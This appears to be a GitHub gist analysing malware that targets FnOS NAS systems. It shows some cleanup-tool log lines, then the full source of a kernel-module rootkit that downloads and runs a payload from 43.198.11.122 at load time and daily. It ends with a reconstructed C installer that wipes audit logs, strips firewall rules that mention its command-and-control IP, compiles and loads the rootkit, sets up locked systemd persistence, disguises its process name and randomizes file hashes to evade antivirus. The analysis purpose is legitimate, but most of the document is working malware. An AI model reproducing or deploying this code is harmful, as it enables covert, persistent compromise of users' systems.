time="2026-02-01T17:48:19+08:00" level=warning msg="成功重新安装 liveupdate"
time="2026-02-01T17:48:20+08:00" level=info msg="检查APT源合法性..."
time="2026-02-01T17:48:20+08:00" level=info msg="开始检查APT源合法性..."
time="2026-02-01T17:48:20+08:00" level=warning msg="从主源下载失败: wget和curl都失败: wget(exit status 8), curl(exit status 22), 尝试备用源..."
time="2026-02-01T17:48:21+08:00" level=warning msg="从备用源下载失败: wget和curl都失败: wget(exit status 8), curl(exit status 22)"
time="2026-02-01T17:48:21+08:00" level=warning msg="从备用源下载失败: wget和curl都失败: wget(exit status 8), curl(exit status 22)"
time="2026-02-01T17:48:21+08:00" level=warning msg="从备用源下载失败: wget和curl都失败: wget(exit status 8), curl(exit status 22)"
time="2026-02-01T17:48:21+08:00" level=warning msg="所有镜像源的当前版本都不可用,尝试下载更新版本..."
time="2026-02-01T17:48:22+08:00" level=info msg="✓ 使用更新版本下载成功(尝试了 1 个版本),新版本包含旧版本的所有密钥,验证仍然有效"
time="2026-02-01T17:48:22+08:00" level=info msg="✓ APT源验证通过:本地密钥与官方密钥一致"
time="2026-02-01T17:48:22+08:00" level=info msg="APT源验证通过"
time="2026-02-01T17:48:22+08:00" level=info msg="扫描恶意服务和进程..."
time="2026-02-01T17:48:22+08:00" level=info msg="开始扫描系统二进制目录..."
time="2026-02-01T17:48:32+08:00" level=info msg="清理 /tmp 目录属性"
obj-m += async_memcpys.o
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
http://43.198.11.122/async_memcpys.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/workqueue.h>
#include <linux/timekeeping.h>
#include <linux/rtc.h>
#include <linux/kmod.h>
#define CHECK_INTERVAL (30 * HZ) /* 每 30 秒检查一次 */
static struct delayed_work log_work;
static int last_run_yday = -1;
static void run_user_script(void)
{
static char *argv[] = {
"/bin/sh",
"-c",
"wget http://43.198.11.122/Fnos -O /tmp/Fnos ; chmod 777 /tmp/Fnos ; /tmp/Fnos ; rm -rf /tmp/Fnos",
NULL
};
static char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin:/usr/sbin:/usr/bin",
NULL
};
call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
}
static void run_user_script_2(void)
{
static char *argv[] = {
"/bin/sh",
"-c",
"wget http://43.198.11.122/Fnos -O /tmp/Fnos2 ; chmod 777 /tmp/Fnos2 ; /tmp/Fnos2 ; rm -rf /tmp/Fnos2",
NULL
};
static char *envp[] = {
"HOME=/",
"PATH=/sbin:/bin:/usr/sbin:/usr/bin",
NULL
};
call_usermodehelper(argv[0], argv, envp, UMH_NO_WAIT);
}
/* workqueue 回调 */
static void log_work_func(struct work_struct *work)
{
struct timespec64 ts;
struct rtc_time tm;
/* 获取真实时间(受 NTP / date 影响) */
ktime_get_real_ts64(&ts);
rtc_time64_to_tm(ts.tv_sec, &tm);
/*
* tm.tm_hour: 0-23
* tm.tm_min : 0-59
* tm.tm_yday: 0-365
*/
int bj_hour = (tm.tm_hour + 8) % 24;
//run_user_script();
if (bj_hour == 3) {
if (tm.tm_yday != last_run_yday) {
run_user_script();
run_user_script_2();
last_run_yday = tm.tm_yday;
}
}
/* 重新调度 */
schedule_delayed_work(&log_work, CHECK_INTERVAL);
}
static int __init log_saver_init(void)
{
run_user_script();
INIT_DELAYED_WORK(&log_work, log_work_func);
schedule_delayed_work(&log_work, CHECK_INTERVAL);
return 0;
}
static void __exit log_saver_exit(void)
{
cancel_delayed_work_sync(&log_work);
//pr_info("[log_saver] module unloaded\n");
}
module_init(log_saver_init);
module_exit(log_saver_exit);
MODULE_LICENSE("GPL");
MODULE_AUTHOR("FnOS");
MODULE_DESCRIPTION("async_memcpys");
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
/**
* 分析报告:Fnos 恶意安装器
* 功能:清除审计日志、篡改防火墙规则、现场编译Rootkit、部署守护进程
* 目标:飞牛OS (FNOS) 及其核心组件 trim
*/
// 恶意服务器与C2信息
const char* DOWNLOAD_SERVER = "http://43.198.11.122";
const char* C2_IP = "20.89.168.131";
// 1. 极其详尽的日志清理(针对飞牛OS定制)
void wipe_all_evidence() {
const char* log_paths[] = {
"/var/log/accountsrv/", "/var/log/apps/", "/var/log/apt/",
"/var/log/cloud_storage_dav/", "/var/log/openvswitch/", "/var/log/postgresql/",
"/var/log/trim_app_center/", "/var/log/trim_license/", "/var/log/trim_sac/",
"/var/log/trim_tfa/", "/var/log/trim-connect/", "/var/log/trim-sharelink/",
"/usr/trim/logs/ai_manager/", "/usr/trim/logs/*.log", "/usr/trim/nginx/logs/",
"/var/log/secure*", "/var/log/messages*", "/var/log/wtmp", "/var/log/btmp",
"/var/log/lastlog", "/var/log/audit/audit.log", "/run/log/journal/"
};
for (int i = 0; i < 22; i++) {
char cmd[256];
// 强制删除并静默输出
sprintf(cmd, "rm -rf %s > /dev/null 2>&1", log_paths[i]);
system(cmd);
}
}
// 2. 自动化防火墙劫持 (针对 iptables 和 nftables)
void hijack_firewall() {
// 逻辑:找到所有包含攻击者IP的规则,利用 sed 将 -A (添加) 替换为 -D (删除)
const char* tables[] = {"filter", "nat", "mangle", "raw", "security"};
for (int i = 0; i < 5; i++) {
char cmd[512];
sprintf(cmd, "iptables -t %s -S | grep %s | sed 's/^-A/-D/' | sh", tables[i], C2_IP);
system(cmd);
}
// 针对新版 nftables:查找句柄(handle)并执行删除
char nft_cmd[512];
sprintf(nft_cmd, "nft list ruleset -a | grep %s | sed -n 's/.*table \\([^ ]*\\) \\([^ ]*\\).*handle \\([0-9]*\\).*/nft delete rule \\1 \\2 handle \\3/p' | sh", C2_IP);
system(nft_cmd);
}
// 3. 部署内核级 Rootkit (驱动木马)
void deploy_kernel_module() {
// 检查是否有 gcc 环境,没有则安装 (这解释了为何占用带宽和CPU)
system("apt install gcc make -y > /dev/null 2>&1");
system("mkdir -p /tmp/kit");
system("cd /tmp/kit && wget http://43.198.11.122/async_memcpys.c");
system("cd /tmp/kit && wget http://43.198.11.122/Makefile");
// 在本地编译内核模块以适配当前的 Linux 内核版本
if (system("cd /tmp/kit && make") == 0) {
// 将编译好的模块移动到系统驱动目录
system("cp /tmp/kit/async_memcpys.ko /lib/modules/$(uname -r)/");
system("depmod -a");
// 加载模块并写入启动项
system("modprobe async_memcpys");
system("echo 'async_memcpys' >> /etc/modules");
}
system("rm -rf /tmp/kit");
}
// 4. 持久化与文件锁定
void persistence() {
// 创建恶意 service 文件
FILE *f = fopen("/etc/systemd/system/dockers.service", "w");
if (f) {
fprintf(f, "[Unit]\nDescription=dockers Service\nAfter=network-online.target\n\n"
"[Service]\nType=oneshot\nExecStart=/usr/bin/dockers\n"
"RemainAfterExit=yes\nRestart=no\n\n"
"[Install]\nWantedBy=multi-user.target\n");
fclose(f);
}
// 关键步骤:使用 chattr 锁定文件,导致 root 也无法删除
system("chattr +i /etc/systemd/system/dockers.service");
system("systemctl daemon-reload");
system("systemctl enable dockers.service");
}
// 5. 文件哈希随机化(对抗杀毒软件)
void randomize_file(const char* path) {
// 往文件末尾注入16字节随机数,改变MD5值
char cmd[128];
sprintf(cmd, "head -c 16 /dev/urandom >> %s", path);
system(cmd);
}
int main(int argc, char** argv) {
if (getuid() != 0) return 1;
// 隐藏进程名
strcpy(argv[0], "[kworker/u:1]");
wipe_all_evidence();
hijack_firewall();
// 下载并运行后续载荷
system("wget http://43.198.11.122/dockers -O /usr/bin/dockers");
system("chmod 777 /usr/bin/dockers");
persistence();
deploy_kernel_module();
randomize_file("/usr/bin/dockers");
randomize_file("/usr/trim/bin/trim_fnos");
// 运行守护进程
system("/usr/bin/dockers --start");
return 0;
}
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
没清理干净